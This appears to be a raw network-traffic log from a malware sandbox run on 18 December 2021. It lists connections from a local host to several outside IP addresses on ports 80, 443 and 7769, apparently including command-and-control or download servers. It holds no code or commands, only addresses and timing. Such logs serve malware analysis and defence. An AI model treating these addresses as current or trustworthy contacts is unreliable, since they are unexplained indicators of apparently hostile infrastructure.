                                                                                                                                  Dec 18, 2021 15:32:00.560616016 CET49796443192.168.2.6162.159.134.233
                                                                                                                                  Dec 18, 2021 15:32:00.561389923 CET44349796162.159.134.233192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:00.561414957 CET44349796162.159.134.233192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:00.561487913 CET49796443192.168.2.6162.159.134.233
                                                                                                                                  Dec 18, 2021 15:32:00.561499119 CET44349796162.159.134.233192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:00.561553001 CET49796443192.168.2.6162.159.134.233
                                                                                                                                  Dec 18, 2021 15:32:00.562628984 CET44349796162.159.134.233192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:00.562654972 CET44349796162.159.134.233192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:00.562722921 CET49796443192.168.2.6162.159.134.233
                                                                                                                                  Dec 18, 2021 15:32:00.562747955 CET44349796162.159.134.233192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:00.562761068 CET49796443192.168.2.6162.159.134.233
                                                                                                                                  Dec 18, 2021 15:32:00.562817097 CET44349796162.159.134.233192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:00.562834978 CET44349796162.159.134.233192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:00.562876940 CET49796443192.168.2.6162.159.134.233
                                                                                                                                  Dec 18, 2021 15:32:00.562884092 CET44349796162.159.134.233192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:00.562933922 CET49796443192.168.2.6162.159.134.233
                                                                                                                                  Dec 18, 2021 15:32:00.563745022 CET44349796162.159.134.233192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:00.563771963 CET44349796162.159.134.233192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:00.563839912 CET49796443192.168.2.6162.159.134.233
                                                                                                                                  Dec 18, 2021 15:32:00.563875914 CET44349796162.159.134.233192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:00.563884020 CET49796443192.168.2.6162.159.134.233
                                                                                                                                  Dec 18, 2021 15:32:00.564681053 CET44349796162.159.134.233192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:00.564734936 CET44349796162.159.134.233192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:00.564775944 CET49796443192.168.2.6162.159.134.233
                                                                                                                                  Dec 18, 2021 15:32:00.564791918 CET44349796162.159.134.233192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:00.564815998 CET49796443192.168.2.6162.159.134.233
                                                                                                                                  Dec 18, 2021 15:32:00.567413092 CET44349796162.159.134.233192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:00.567447901 CET44349796162.159.134.233192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:00.567528963 CET49796443192.168.2.6162.159.134.233
                                                                                                                                  Dec 18, 2021 15:32:00.567544937 CET44349796162.159.134.233192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:00.567553043 CET49796443192.168.2.6162.159.134.233
                                                                                                                                  Dec 18, 2021 15:32:00.567625046 CET44349796162.159.134.233192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:00.567676067 CET49796443192.168.2.6162.159.134.233
                                                                                                                                  Dec 18, 2021 15:32:00.567686081 CET44349796162.159.134.233192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:00.567722082 CET49796443192.168.2.6162.159.134.233
                                                                                                                                  Dec 18, 2021 15:32:00.567739010 CET44349796162.159.134.233192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:00.567774057 CET49796443192.168.2.6162.159.134.233
                                                                                                                                  Dec 18, 2021 15:32:00.628758907 CET8049791222.232.238.243192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:01.024974108 CET49796443192.168.2.6162.159.134.233
                                                                                                                                  Dec 18, 2021 15:32:01.056133032 CET49796443192.168.2.6162.159.134.233
                                                                                                                                  Dec 18, 2021 15:32:01.056164026 CET44349796162.159.134.233192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:01.056178093 CET49796443192.168.2.6162.159.134.233
                                                                                                                                  Dec 18, 2021 15:32:01.056185007 CET44349796162.159.134.233192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:03.740859985 CET4980380192.168.2.6190.117.75.91
                                                                                                                                  Dec 18, 2021 15:32:03.974129915 CET8049803190.117.75.91192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:03.974328041 CET4980380192.168.2.6190.117.75.91
                                                                                                                                  Dec 18, 2021 15:32:03.974551916 CET4980380192.168.2.6190.117.75.91
                                                                                                                                  Dec 18, 2021 15:32:03.974584103 CET4980380192.168.2.6190.117.75.91
                                                                                                                                  Dec 18, 2021 15:32:04.211042881 CET8049803190.117.75.91192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:06.855391026 CET8049803190.117.75.91192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:06.855776072 CET4980380192.168.2.6190.117.75.91
                                                                                                                                  Dec 18, 2021 15:32:06.856286049 CET8049803190.117.75.91192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:06.856458902 CET4980380192.168.2.6190.117.75.91
                                                                                                                                  Dec 18, 2021 15:32:06.856477976 CET4980380192.168.2.6190.117.75.91
                                                                                                                                  Dec 18, 2021 15:32:06.907058954 CET4982280192.168.2.6218.38.155.210
                                                                                                                                  Dec 18, 2021 15:32:07.089365959 CET8049803190.117.75.91192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:07.145593882 CET8049822218.38.155.210192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:07.146065950 CET4982280192.168.2.6218.38.155.210
                                                                                                                                  Dec 18, 2021 15:32:07.146100044 CET4982280192.168.2.6218.38.155.210
                                                                                                                                  Dec 18, 2021 15:32:07.146483898 CET4982280192.168.2.6218.38.155.210
                                                                                                                                  Dec 18, 2021 15:32:07.385102987 CET8049822218.38.155.210192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:08.333070993 CET8049822218.38.155.210192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:08.333113909 CET8049822218.38.155.210192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:08.333226919 CET4982280192.168.2.6218.38.155.210
                                                                                                                                  Dec 18, 2021 15:32:08.333264112 CET4982280192.168.2.6218.38.155.210
                                                                                                                                  Dec 18, 2021 15:32:08.365823984 CET4982780192.168.2.6222.232.238.243
                                                                                                                                  Dec 18, 2021 15:32:08.569731951 CET8049822218.38.155.210192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:08.641016006 CET8049827222.232.238.243192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:08.641659021 CET4982780192.168.2.6222.232.238.243
                                                                                                                                  Dec 18, 2021 15:32:08.641693115 CET4982780192.168.2.6222.232.238.243
                                                                                                                                  Dec 18, 2021 15:32:08.641732931 CET4982780192.168.2.6222.232.238.243
                                                                                                                                  Dec 18, 2021 15:32:08.917000055 CET8049827222.232.238.243192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:09.862582922 CET8049827222.232.238.243192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:09.862606049 CET8049827222.232.238.243192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:09.862700939 CET4982780192.168.2.6222.232.238.243
                                                                                                                                  Dec 18, 2021 15:32:09.862811089 CET4982780192.168.2.6222.232.238.243
                                                                                                                                  Dec 18, 2021 15:32:09.890300035 CET4982880192.168.2.6218.38.155.210
                                                                                                                                  Dec 18, 2021 15:32:10.118732929 CET8049828218.38.155.210192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:10.118834972 CET4982880192.168.2.6218.38.155.210
                                                                                                                                  Dec 18, 2021 15:32:10.118962049 CET4982880192.168.2.6218.38.155.210
                                                                                                                                  Dec 18, 2021 15:32:10.118979931 CET4982880192.168.2.6218.38.155.210
                                                                                                                                  Dec 18, 2021 15:32:10.137574911 CET8049827222.232.238.243192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:10.346884966 CET8049828218.38.155.210192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:11.255882978 CET8049828218.38.155.210192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:11.255908966 CET8049828218.38.155.210192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:11.255987883 CET4982880192.168.2.6218.38.155.210
                                                                                                                                  Dec 18, 2021 15:32:11.256035089 CET4982880192.168.2.6218.38.155.210
                                                                                                                                  Dec 18, 2021 15:32:11.291066885 CET4982980192.168.2.6218.38.155.210
                                                                                                                                  Dec 18, 2021 15:32:11.484241962 CET8049828218.38.155.210192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:11.531435966 CET8049829218.38.155.210192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:11.531950951 CET4982980192.168.2.6218.38.155.210
                                                                                                                                  Dec 18, 2021 15:32:11.532268047 CET4982980192.168.2.6218.38.155.210
                                                                                                                                  Dec 18, 2021 15:32:11.532313108 CET4982980192.168.2.6218.38.155.210
                                                                                                                                  Dec 18, 2021 15:32:11.771794081 CET8049829218.38.155.210192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:12.696820021 CET8049829218.38.155.210192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:12.696947098 CET8049829218.38.155.210192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:12.697093010 CET4982980192.168.2.6218.38.155.210
                                                                                                                                  Dec 18, 2021 15:32:12.697144032 CET4982980192.168.2.6218.38.155.210
                                                                                                                                  Dec 18, 2021 15:32:12.753649950 CET49830443192.168.2.650.62.140.96
                                                                                                                                  Dec 18, 2021 15:32:12.753741026 CET4434983050.62.140.96192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:12.753865957 CET49830443192.168.2.650.62.140.96
                                                                                                                                  Dec 18, 2021 15:32:12.754276991 CET49830443192.168.2.650.62.140.96
                                                                                                                                  Dec 18, 2021 15:32:12.754300117 CET4434983050.62.140.96192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:12.946594000 CET8049829218.38.155.210192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:13.345998049 CET4434983050.62.140.96192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:13.346108913 CET49830443192.168.2.650.62.140.96
                                                                                                                                  Dec 18, 2021 15:32:13.348289013 CET49830443192.168.2.650.62.140.96
                                                                                                                                  Dec 18, 2021 15:32:13.348310947 CET4434983050.62.140.96192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:13.348584890 CET4434983050.62.140.96192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:13.349478960 CET49830443192.168.2.650.62.140.96
                                                                                                                                  Dec 18, 2021 15:32:13.392882109 CET4434983050.62.140.96192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:13.999672890 CET4434983050.62.140.96192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:13.999749899 CET4434983050.62.140.96192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:13.999854088 CET49830443192.168.2.650.62.140.96
                                                                                                                                  Dec 18, 2021 15:32:13.999949932 CET49830443192.168.2.650.62.140.96
                                                                                                                                  Dec 18, 2021 15:32:13.999969006 CET4434983050.62.140.96192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:13.999979973 CET49830443192.168.2.650.62.140.96
                                                                                                                                  Dec 18, 2021 15:32:13.999985933 CET4434983050.62.140.96192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:14.027349949 CET49831443192.168.2.650.62.140.96
                                                                                                                                  Dec 18, 2021 15:32:14.027390957 CET4434983150.62.140.96192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:14.027477026 CET49831443192.168.2.650.62.140.96
                                                                                                                                  Dec 18, 2021 15:32:14.027930975 CET49831443192.168.2.650.62.140.96
                                                                                                                                  Dec 18, 2021 15:32:14.027955055 CET4434983150.62.140.96192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:14.613876104 CET4434983150.62.140.96192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:14.614026070 CET49831443192.168.2.650.62.140.96
                                                                                                                                  Dec 18, 2021 15:32:14.617754936 CET49831443192.168.2.650.62.140.96
                                                                                                                                  Dec 18, 2021 15:32:14.617764950 CET4434983150.62.140.96192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:14.618254900 CET4434983150.62.140.96192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:14.620513916 CET49831443192.168.2.650.62.140.96
                                                                                                                                  Dec 18, 2021 15:32:14.664860964 CET4434983150.62.140.96192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:15.282406092 CET4434983150.62.140.96192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:15.282433033 CET4434983150.62.140.96192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:15.282562971 CET49831443192.168.2.650.62.140.96
                                                                                                                                  Dec 18, 2021 15:32:15.282582045 CET4434983150.62.140.96192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:15.286756039 CET4434983150.62.140.96192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:15.286883116 CET4434983150.62.140.96192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:15.286926031 CET49831443192.168.2.650.62.140.96
                                                                                                                                  Dec 18, 2021 15:32:15.287003040 CET49831443192.168.2.650.62.140.96
                                                                                                                                  Dec 18, 2021 15:32:15.287341118 CET49831443192.168.2.650.62.140.96
                                                                                                                                  Dec 18, 2021 15:32:15.287359953 CET4434983150.62.140.96192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:15.319732904 CET4983380192.168.2.6218.38.155.210
                                                                                                                                  Dec 18, 2021 15:32:15.618144035 CET8049833218.38.155.210192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:15.618350029 CET4983380192.168.2.6218.38.155.210
                                                                                                                                  Dec 18, 2021 15:32:15.618463993 CET4983380192.168.2.6218.38.155.210
                                                                                                                                  Dec 18, 2021 15:32:15.618493080 CET4983380192.168.2.6218.38.155.210
                                                                                                                                  Dec 18, 2021 15:32:15.916667938 CET8049833218.38.155.210192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:16.519921064 CET8049833218.38.155.210192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:16.519959927 CET8049833218.38.155.210192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:16.520031929 CET4983380192.168.2.6218.38.155.210
                                                                                                                                  Dec 18, 2021 15:32:16.520073891 CET4983380192.168.2.6218.38.155.210
                                                                                                                                  Dec 18, 2021 15:32:16.558151960 CET4983580192.168.2.6222.232.238.243
                                                                                                                                  Dec 18, 2021 15:32:16.797059059 CET8049835222.232.238.243192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:16.797313929 CET4983580192.168.2.6222.232.238.243
                                                                                                                                  Dec 18, 2021 15:32:16.797343969 CET4983580192.168.2.6222.232.238.243
                                                                                                                                  Dec 18, 2021 15:32:16.797380924 CET4983580192.168.2.6222.232.238.243
                                                                                                                                  Dec 18, 2021 15:32:16.817920923 CET8049833218.38.155.210192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:17.038259983 CET8049835222.232.238.243192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:17.964591026 CET8049835222.232.238.243192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:17.964636087 CET8049835222.232.238.243192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:17.964867115 CET4983580192.168.2.6222.232.238.243
                                                                                                                                  Dec 18, 2021 15:32:17.965218067 CET4983580192.168.2.6222.232.238.243
                                                                                                                                  Dec 18, 2021 15:32:17.995362043 CET4984080192.168.2.6218.38.155.210
                                                                                                                                  Dec 18, 2021 15:32:18.203943968 CET8049835222.232.238.243192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:18.243674040 CET8049840218.38.155.210192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:18.243789911 CET4984080192.168.2.6218.38.155.210
                                                                                                                                  Dec 18, 2021 15:32:18.244738102 CET4984080192.168.2.6218.38.155.210
                                                                                                                                  Dec 18, 2021 15:32:18.244764090 CET4984080192.168.2.6218.38.155.210
                                                                                                                                  Dec 18, 2021 15:32:18.492994070 CET8049840218.38.155.210192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:19.438575983 CET8049840218.38.155.210192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:19.438642025 CET8049840218.38.155.210192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:19.439713955 CET4984080192.168.2.6218.38.155.210
                                                                                                                                  Dec 18, 2021 15:32:19.618932962 CET4984080192.168.2.6218.38.155.210
                                                                                                                                  Dec 18, 2021 15:32:19.707695007 CET4984180192.168.2.6148.0.74.229
                                                                                                                                  Dec 18, 2021 15:32:19.867477894 CET8049840218.38.155.210192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:19.871018887 CET8049841148.0.74.229192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:19.871113062 CET4984180192.168.2.6148.0.74.229
                                                                                                                                  Dec 18, 2021 15:32:19.871263027 CET4984180192.168.2.6148.0.74.229
                                                                                                                                  Dec 18, 2021 15:32:19.871454954 CET4984180192.168.2.6148.0.74.229
                                                                                                                                  Dec 18, 2021 15:32:20.034909964 CET8049841148.0.74.229192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:20.422930956 CET8049841148.0.74.229192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:20.423893929 CET8049841148.0.74.229192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:20.424041986 CET4984180192.168.2.6148.0.74.229
                                                                                                                                  Dec 18, 2021 15:32:20.975416899 CET4984180192.168.2.6148.0.74.229
                                                                                                                                  Dec 18, 2021 15:32:21.021038055 CET4984280192.168.2.6218.38.155.210
                                                                                                                                  Dec 18, 2021 15:32:21.137017965 CET8049841148.0.74.229192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:21.250902891 CET8049842218.38.155.210192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:21.251034021 CET4984280192.168.2.6218.38.155.210
                                                                                                                                  Dec 18, 2021 15:32:21.251153946 CET4984280192.168.2.6218.38.155.210
                                                                                                                                  Dec 18, 2021 15:32:21.251415968 CET4984280192.168.2.6218.38.155.210
                                                                                                                                  Dec 18, 2021 15:32:21.482134104 CET8049842218.38.155.210192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:22.396996021 CET8049842218.38.155.210192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:22.397031069 CET8049842218.38.155.210192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:22.397109985 CET4984280192.168.2.6218.38.155.210
                                                                                                                                  Dec 18, 2021 15:32:22.397150993 CET4984280192.168.2.6218.38.155.210
                                                                                                                                  Dec 18, 2021 15:32:22.422105074 CET4984380192.168.2.6148.0.74.229
                                                                                                                                  Dec 18, 2021 15:32:22.583667994 CET8049843148.0.74.229192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:22.583808899 CET4984380192.168.2.6148.0.74.229
                                                                                                                                  Dec 18, 2021 15:32:22.583885908 CET4984380192.168.2.6148.0.74.229
                                                                                                                                  Dec 18, 2021 15:32:22.583964109 CET4984380192.168.2.6148.0.74.229
                                                                                                                                  Dec 18, 2021 15:32:22.626990080 CET8049842218.38.155.210192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:22.747687101 CET8049843148.0.74.229192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:23.131725073 CET8049843148.0.74.229192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:23.131756067 CET8049843148.0.74.229192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:23.131855965 CET4984380192.168.2.6148.0.74.229
                                                                                                                                  Dec 18, 2021 15:32:23.131896973 CET4984380192.168.2.6148.0.74.229
                                                                                                                                  Dec 18, 2021 15:32:23.158874989 CET4984480192.168.2.6190.117.75.91
                                                                                                                                  Dec 18, 2021 15:32:23.293730974 CET8049843148.0.74.229192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:23.400351048 CET8049844190.117.75.91192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:23.403983116 CET4984480192.168.2.6190.117.75.91
                                                                                                                                  Dec 18, 2021 15:32:23.404071093 CET4984480192.168.2.6190.117.75.91
                                                                                                                                  Dec 18, 2021 15:32:23.404803991 CET4984480192.168.2.6190.117.75.91
                                                                                                                                  Dec 18, 2021 15:32:23.633344889 CET8049844190.117.75.91192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:24.419065952 CET8049844190.117.75.91192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:24.419090033 CET8049844190.117.75.91192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:24.419169903 CET4984480192.168.2.6190.117.75.91
                                                                                                                                  Dec 18, 2021 15:32:24.419434071 CET4984480192.168.2.6190.117.75.91
                                                                                                                                  Dec 18, 2021 15:32:24.419485092 CET4984480192.168.2.6190.117.75.91
                                                                                                                                  Dec 18, 2021 15:32:24.446852922 CET4984780192.168.2.6190.117.75.91
                                                                                                                                  Dec 18, 2021 15:32:24.645602942 CET8049844190.117.75.91192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:24.670047045 CET8049847190.117.75.91192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:24.670205116 CET4984780192.168.2.6190.117.75.91
                                                                                                                                  Dec 18, 2021 15:32:24.670314074 CET4984780192.168.2.6190.117.75.91
                                                                                                                                  Dec 18, 2021 15:32:24.670326948 CET4984780192.168.2.6190.117.75.91
                                                                                                                                  Dec 18, 2021 15:32:24.893834114 CET8049847190.117.75.91192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:25.706753016 CET8049847190.117.75.91192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:25.706784964 CET8049847190.117.75.91192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:25.706871986 CET4984780192.168.2.6190.117.75.91
                                                                                                                                  Dec 18, 2021 15:32:25.706923008 CET4984780192.168.2.6190.117.75.91
                                                                                                                                  Dec 18, 2021 15:32:25.748404026 CET4984880192.168.2.6218.38.155.210
                                                                                                                                  Dec 18, 2021 15:32:25.929014921 CET8049847190.117.75.91192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:25.977868080 CET8049848218.38.155.210192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:25.977989912 CET4984880192.168.2.6218.38.155.210
                                                                                                                                  Dec 18, 2021 15:32:25.978107929 CET4984880192.168.2.6218.38.155.210
                                                                                                                                  Dec 18, 2021 15:32:25.978123903 CET4984880192.168.2.6218.38.155.210
                                                                                                                                  Dec 18, 2021 15:32:26.207787037 CET8049848218.38.155.210192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:26.829504967 CET8049848218.38.155.210192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:26.829546928 CET8049848218.38.155.210192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:26.829636097 CET4984880192.168.2.6218.38.155.210
                                                                                                                                  Dec 18, 2021 15:32:26.829718113 CET4984880192.168.2.6218.38.155.210
                                                                                                                                  Dec 18, 2021 15:32:26.917810917 CET4984980192.168.2.6211.59.14.90
                                                                                                                                  Dec 18, 2021 15:32:27.061069965 CET8049848218.38.155.210192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:27.163410902 CET8049849211.59.14.90192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:27.166682959 CET4984980192.168.2.6211.59.14.90
                                                                                                                                  Dec 18, 2021 15:32:27.166806936 CET4984980192.168.2.6211.59.14.90
                                                                                                                                  Dec 18, 2021 15:32:27.166821957 CET4984980192.168.2.6211.59.14.90
                                                                                                                                  Dec 18, 2021 15:32:27.411588907 CET8049849211.59.14.90192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:28.348505974 CET8049849211.59.14.90192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:28.348541021 CET8049849211.59.14.90192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:28.350780010 CET4984980192.168.2.6211.59.14.90
                                                                                                                                  Dec 18, 2021 15:32:28.350805998 CET4984980192.168.2.6211.59.14.90
                                                                                                                                  Dec 18, 2021 15:32:28.360066891 CET498507769192.168.2.645.9.20.240
                                                                                                                                  Dec 18, 2021 15:32:28.421839952 CET77694985045.9.20.240192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:28.422332048 CET498507769192.168.2.645.9.20.240
                                                                                                                                  Dec 18, 2021 15:32:28.422475100 CET498507769192.168.2.645.9.20.240
                                                                                                                                  Dec 18, 2021 15:32:28.486366034 CET77694985045.9.20.240192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:28.486413002 CET77694985045.9.20.240192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:28.486435890 CET77694985045.9.20.240192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:28.486458063 CET77694985045.9.20.240192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:28.488882065 CET498507769192.168.2.645.9.20.240
                                                                                                                                  Dec 18, 2021 15:32:28.550749063 CET77694985045.9.20.240192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:28.550777912 CET77694985045.9.20.240192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:28.550796032 CET77694985045.9.20.240192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:28.550812006 CET77694985045.9.20.240192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:28.550828934 CET77694985045.9.20.240192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:28.550843954 CET77694985045.9.20.240192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:28.550868034 CET77694985045.9.20.240192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:28.550885916 CET77694985045.9.20.240192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:28.563023090 CET498507769192.168.2.645.9.20.240
                                                                                                                                  Dec 18, 2021 15:32:28.563204050 CET498507769192.168.2.645.9.20.240
                                                                                                                                  Dec 18, 2021 15:32:28.604453087 CET8049849211.59.14.90192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:28.624782085 CET77694985045.9.20.240192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:28.624829054 CET77694985045.9.20.240192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:28.624878883 CET77694985045.9.20.240192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:28.624903917 CET77694985045.9.20.240192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:28.624927044 CET77694985045.9.20.240192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:28.624952078 CET77694985045.9.20.240192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:28.624977112 CET77694985045.9.20.240192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:28.625000000 CET77694985045.9.20.240192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:28.625024080 CET77694985045.9.20.240192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:28.625049114 CET77694985045.9.20.240192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:28.625073910 CET77694985045.9.20.240192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:28.625098944 CET77694985045.9.20.240192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:28.625122070 CET77694985045.9.20.240192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:28.626115084 CET498507769192.168.2.645.9.20.240
                                                                                                                                  Dec 18, 2021 15:32:28.626151085 CET498507769192.168.2.645.9.20.240
                                                                                                                                  Dec 18, 2021 15:32:28.687902927 CET77694985045.9.20.240192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:28.687939882 CET77694985045.9.20.240192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:28.687952995 CET77694985045.9.20.240192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:28.687969923 CET77694985045.9.20.240192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:28.687983036 CET77694985045.9.20.240192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:28.687995911 CET77694985045.9.20.240192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:28.688009977 CET77694985045.9.20.240192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:28.688023090 CET77694985045.9.20.240192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:28.688041925 CET77694985045.9.20.240192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:28.688055992 CET77694985045.9.20.240192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:28.688072920 CET77694985045.9.20.240192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:28.688091040 CET77694985045.9.20.240192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:28.688971043 CET77694985045.9.20.240192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:28.688999891 CET77694985045.9.20.240192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:28.689013958 CET77694985045.9.20.240192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:28.689029932 CET77694985045.9.20.240192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:28.689043045 CET77694985045.9.20.240192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:28.689057112 CET77694985045.9.20.240192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:28.689069986 CET77694985045.9.20.240192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:28.689083099 CET77694985045.9.20.240192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:28.689100027 CET77694985045.9.20.240192.168.2.6
